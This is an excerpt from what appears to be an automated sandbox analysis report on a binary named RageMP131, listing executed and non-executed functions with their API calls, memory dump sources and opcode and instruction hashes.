Opcode Fuzzy Hash: 1de15522642c08ca30b6178d93e716d1b6e9955fbfb49e8b0ea6dea58ab5fe58
Instruction Fuzzy Hash: E63124E7A0C115EFA16AE0426B5CAF7266FE6DE73073284B6FC47C6101E3940AC9803C

Function 05110572 Relevance: 1.7, APIs: 1, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fdb5c172f7b608f5819b034644ef7391243d922476008d85bfc8296d446d44
Instruction ID: a561980bbe6f6ba2f6dfd4f6467006dd8af690b6181cd37f4fcbbba833df3aa7
Opcode Fuzzy Hash: a0fdb5c172f7b608f5819b034644ef7391243d922476008d85bfc8296d446d44
Instruction Fuzzy Hash: 003135E7A0C115EF616AE0426B6CAF7266FE2DE33073284B6FC47C6101E3940AC9843C

Function 05110584 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4f7efb3d377b13c32ea11523977f88e7735737f8cde9bc08e93cbe5d608ac1e7
Instruction ID: 983d82727cc0ad0e7ab8ac543b8cd21f994def4ef2ec90c878bfc68d23fa567a
Opcode Fuzzy Hash: 4f7efb3d377b13c32ea11523977f88e7735737f8cde9bc08e93cbe5d608ac1e7
Instruction Fuzzy Hash: CE3125E7E0C115BEA17AE0421B5CAF6166FE2DE77073284B6FC47D6141E3944AC6803D

Function 051105AE Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2024d58740c61aa84a49b8a3d3b1566646f663617b4080e354143511da1eaba3
Instruction ID: 36e938d128f9c895e6fd9446803fb76897871382619da0fbf53ea2d69b318fe6
Opcode Fuzzy Hash: 2024d58740c61aa84a49b8a3d3b1566646f663617b4080e354143511da1eaba3
Instruction Fuzzy Hash: 923146E7A4C216AFA22AE0421B5C6F7666FE7DF77073240BAF847D6141D3940AC5813D

Function 0511059F Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: fc385874f1e5ce44d70b2ce58a0eea07fdccdebc9df38cd10d50df37914987c2
Instruction ID: 93c853f34ea35ccfe23ebea65c0d22719a7ba5a6ecc188fb1a3ffe776ba4b5fb
Opcode Fuzzy Hash: fc385874f1e5ce44d70b2ce58a0eea07fdccdebc9df38cd10d50df37914987c2
Instruction Fuzzy Hash: DC21F4EBE4C115AEA16AE0421B6C6F6266FE3DE77073284B6FC47D6141E3940AC6843D

Function 0062ACB0 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0062AE01

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction ID: 9e2ca5445aba634514ad649963c140dbc83a1039a5f065516e1cfd74149cd958
Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
Instruction Fuzzy Hash: 7F412672A005249BCF15DFA8ED806AEBBAAEF44301F1406ADF804EB301D770DE119BD6

Function 051105DC Relevance: 1.6, APIs: 1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 94d062787a92866a1521033212292ce4e77610b4490c451db8d016c0fad70cbb
Instruction ID: 5b59adad50c6dd6ab484f8b4cd76df2e82f912192895a62d45561d57d0e28d1d
Opcode Fuzzy Hash: 94d062787a92866a1521033212292ce4e77610b4490c451db8d016c0fad70cbb
Instruction Fuzzy Hash: 6B2137E7E4C105AFA12AE0421B5C6F6266FA3DE77073244B6FC07D6641D3D40AC5843D

Function 051105EB Relevance: 1.6, APIs: 1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4040b13e33c23258982fc5c3ba7e2af9de00d00e4be7fa0764b31d4529487b23
Instruction ID: 9201f650ef2f2a9c9bc3d12c3745b86536b1ffca0778d8cde05f466b362cfa5e
Opcode Fuzzy Hash: 4040b13e33c23258982fc5c3ba7e2af9de00d00e4be7fa0764b31d4529487b23
Instruction Fuzzy Hash: 372127E7E0C209AFA12AE0425B5C6F6526FD7DE77073245B6FC47D6241D3940AC5843D

Function 05110623 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: b2f6d7f1bcd20effc701e934b229f95cbf0a0f334be2cd6e42b5078a2b11f758
Instruction ID: 0b4135aee0213582dea7baad10d3331b3ef65234c9145d16f1afd1856c4ae91d
Opcode Fuzzy Hash: b2f6d7f1bcd20effc701e934b229f95cbf0a0f334be2cd6e42b5078a2b11f758
Instruction Fuzzy Hash: 282167A7E0C21AAE617AE0421B5C9F6666FD6CE77033244B6FC47DA141D3C04EC6857C

Function 0511061C Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 15cb91c32a8af8f475dbadca118e25cf812e22a609869e8ea3674d3d5925525b
Instruction ID: 5747e1b9c10e1c773ff93dfb9880d5d4fd5d56e3b68b545e848f2b8f23612025
Opcode Fuzzy Hash: 15cb91c32a8af8f475dbadca118e25cf812e22a609869e8ea3674d3d5925525b
Instruction Fuzzy Hash: A41102E6E0C219AE617AE0421B5CAF6226FD6DE77033244B6FC47D6200D3944EC5843C

Function 0511064E Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: eb6a244768f8231093b76542e328ec61eb13bfdea19b31ab4171d524e379e70b
Instruction ID: f09c7acfa2c73a0a48d37029f28a5ce63faf11851c9517bbe1dd6653b00b4c6d
Opcode Fuzzy Hash: eb6a244768f8231093b76542e328ec61eb13bfdea19b31ab4171d524e379e70b
Instruction Fuzzy Hash: FB1127A6A0D21AAF913AE4021B5C9F6276BD6CE37033244B6F847D6201D3944AC5857D

Function 051106B0 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 5a43ad75715efc6a0a3d59742cad036ea86505684baf12d28850f77b41a231a9
Instruction ID: 53cc52f0dbff1d32423e3dc6a745d58e60f3a980c6f391df301d2b762102c074
Opcode Fuzzy Hash: 5a43ad75715efc6a0a3d59742cad036ea86505684baf12d28850f77b41a231a9
Instruction Fuzzy Hash: 221180ABA091166F9126F4110A5C6F7276FD6DE77033244B6FC53D6100E3804DC6847C

Function 05110672 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 86e0109005186f45bd461f2175336d8c9a184ff087babf27ff2b2b70859ae528
Instruction ID: 94b98fd137047be508fd00aaf52b47feaee6370399fa54f7e001b91b9c9ad190
Opcode Fuzzy Hash: 86e0109005186f45bd461f2175336d8c9a184ff087babf27ff2b2b70859ae528
Instruction Fuzzy Hash: C2115BAAA0D10AAFA126F0411B5CAF6266FD7CE77077244B5FC47D6101E3908AC64578

Function 05110660 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e7600e04e478a0cea0a85d995f592975406f6aceaf38ab1138a092cf75b43472
Instruction ID: b95f1e74b14c2c9c79904c0ad4e7212bf48b7c2141127704136abf4be8a86985
Opcode Fuzzy Hash: e7600e04e478a0cea0a85d995f592975406f6aceaf38ab1138a092cf75b43472
Instruction Fuzzy Hash: 6D1127AAA0D20AAF613AF0421B5C9F6126FD2DE77037244B6F857DA201D3D44AC6453C

Function 0511069E Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: dd478e98b3d2a9833e25cff5b55b6b30f3f4839c03db554e1e45be874b17e3ed
Instruction ID: e91d9022c6b4df13afaa18b930baec1505ec6f32c50def9007eccb7c436bf86b
Opcode Fuzzy Hash: dd478e98b3d2a9833e25cff5b55b6b30f3f4839c03db554e1e45be874b17e3ed
Instruction Fuzzy Hash: 350126DAB09209BE6026F0411B5CAF7126FD2DE77037284B6FC47D6500D3D44AC6453C

Function 051106DF Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 9659d3e54260f125c6b780439ff42a305d55dc3a7e9d4f5d8bd60ad80aaf0e0b
Instruction ID: 5ea15e3d597edb50bc9ce71d4b1f9e283616cf7e0e2160d754952afa47725a07
Opcode Fuzzy Hash: 9659d3e54260f125c6b780439ff42a305d55dc3a7e9d4f5d8bd60ad80aaf0e0b
Instruction Fuzzy Hash: B9017BA6F0820BAFE231F1611E5C6BB53AED6DC720772887AF883C6001D344C5C6097D

Function 006B1832 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,006B1719,00000000,CF830579,006EFCB8,0000000C,006B17D5,006A58DD,?), ref: 006B1888

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 8d882ae05e53a93e8af5db0b1f4d9ddee17e335f54e79af328b0f1a4f70f8330
Instruction ID: 9b036b2b8da0ac5d8becef351c9a640111f55e56fd01a683b93dcfe4508480f0
Opcode Fuzzy Hash: 8d882ae05e53a93e8af5db0b1f4d9ddee17e335f54e79af328b0f1a4f70f8330
Instruction Fuzzy Hash: CB118E7360821036C72522346826BFE2B8B9FD3734F75021DF9048F2D2DE218CC14359

Function 006AAD7C Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,006EF970,0069B2D2,00000002,0069B2D2,00000000,?,?,?,006AAE86,00000000,?,0069B2D2,00000002,006EF970), ref: 006AADB8

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 04c38c70e5e67996e03a20c4a0605a86f723672adecb9b72a863cfaa4d375e45
Instruction ID: 22849b9dec336940aed7c9a5c756e11445a32ece5833b289634cddd7e15a65c2
Opcode Fuzzy Hash: 04c38c70e5e67996e03a20c4a0605a86f723672adecb9b72a863cfaa4d375e45
Instruction Fuzzy Hash: 4B010432614245AFCF09AF58DC059DE3B6BDF82320B240249E8519B290EB71DD52CF90

Function 05110710 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7d22168d2f2a84b1a1836686e0e63e57143390d46369afeff20e09c7d628d07a
Instruction ID: 3df155abdc8c67d4fab7743fb3dc98401d8569f0af68254494e8546d90f3ae61
Opcode Fuzzy Hash: 7d22168d2f2a84b1a1836686e0e63e57143390d46369afeff20e09c7d628d07a
Instruction Fuzzy Hash: 85F0B4AAB0910AAFB125F0412F5CAF7236DD7DCB3077288B6F887D5400D3944ACA097D

Function 0069BFB1 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 005C1FDE

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
Instruction ID: d403e680dad0dac643e662c12a223aaad6f45f1c8de352debb111a33a0deecec
Opcode Fuzzy Hash: 016d849f99cf167e4fd9a8357d49ff61ced01ca53316cc7f5d3acdc8c4675e6a
Instruction Fuzzy Hash: 72012B3540460D77CF14AED4EC01999B79EDE02360B50853DF90496951FB70E9908BE9

Function 05110720 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 05110727

Memory Dump Source

Source File: 0000000C.00000002.4135953024.0000000005110000.00000040.00001000.00020000.00000000.sdmp, Offset: 05110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5110000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 8ffbef9975dc585e75a7fda81dbf89f915230f5409aa3c13edb769c3a09dcc05
Instruction ID: 01062d9be5a53e14ce583db21b6551f7c88588231005e5686087a153199a4ce1
Opcode Fuzzy Hash: 8ffbef9975dc585e75a7fda81dbf89f915230f5409aa3c13edb769c3a09dcc05
Instruction Fuzzy Hash: D9F082A6B1960AAFB126F4452E5CAB7236DD7DC730772C8B6F886D9000D39489C6097C

Function 006B3113 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0069A41C,?,?,006B2A99,00000001,00000364,?,00000006,000000FF,?,0069D39B,?,?,?,?), ref: 006B3155

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7792184069740be1e175ed1e216448155741cf0702fb6bca346f68947e4f3b8c
Instruction ID: 3d5ea5372ab872a793722091d7e54b4688bde702eb3902c59a0625cac5cf3672
Opcode Fuzzy Hash: 7792184069740be1e175ed1e216448155741cf0702fb6bca346f68947e4f3b8c
Instruction Fuzzy Hash: 1FF0B471705638669B216A6D4C01BDB374FAF427A0B158015BC0896380CF30DE8147F4

Function 006B3B4D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0069D39B,?,?,?,?,?,005C2D8D,0069A41C,?,?,0069A41C), ref: 006B3B80

Memory Dump Source

Source File: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true

Associated: 0000000C.00000002.4126799618.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4126981590.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4127887985.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4128039847.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130115087.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130531181.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130572952.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130629642.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000C.00000002.4130681821.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_5c0000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2b13ca915fdb1a6c380a62cb0ac4430f46034b10ccb13550d74968db2edae58d
Instruction ID: 44a26996c7d40496956b391cdf2b89e9c02d3823269eca9dc1fa9511170bce6e
Opcode Fuzzy Hash: 2b13ca915fdb1a6c380a62cb0ac4430f46034b10ccb13550d74968db2edae58d
Instruction Fuzzy Hash: 68E0EDB13002366AE62036294C00BEB7A4FDFA23B0F150228AC1896385CF60CE8083B8

Non-executed Functions

Function 0062A120 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0062A143
std::_Lockit::_Lockit.LIBCPMT ref: 0062A165
std::_Lockit::~_Lockit.LIBCPMT ref: 0062A185
std::_Lockit::~_Lockit.LIBCPMT ref: 0062A1AF
std::_Lockit::_Lockit.LIBCPMT ref: 0062A21D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0062A269
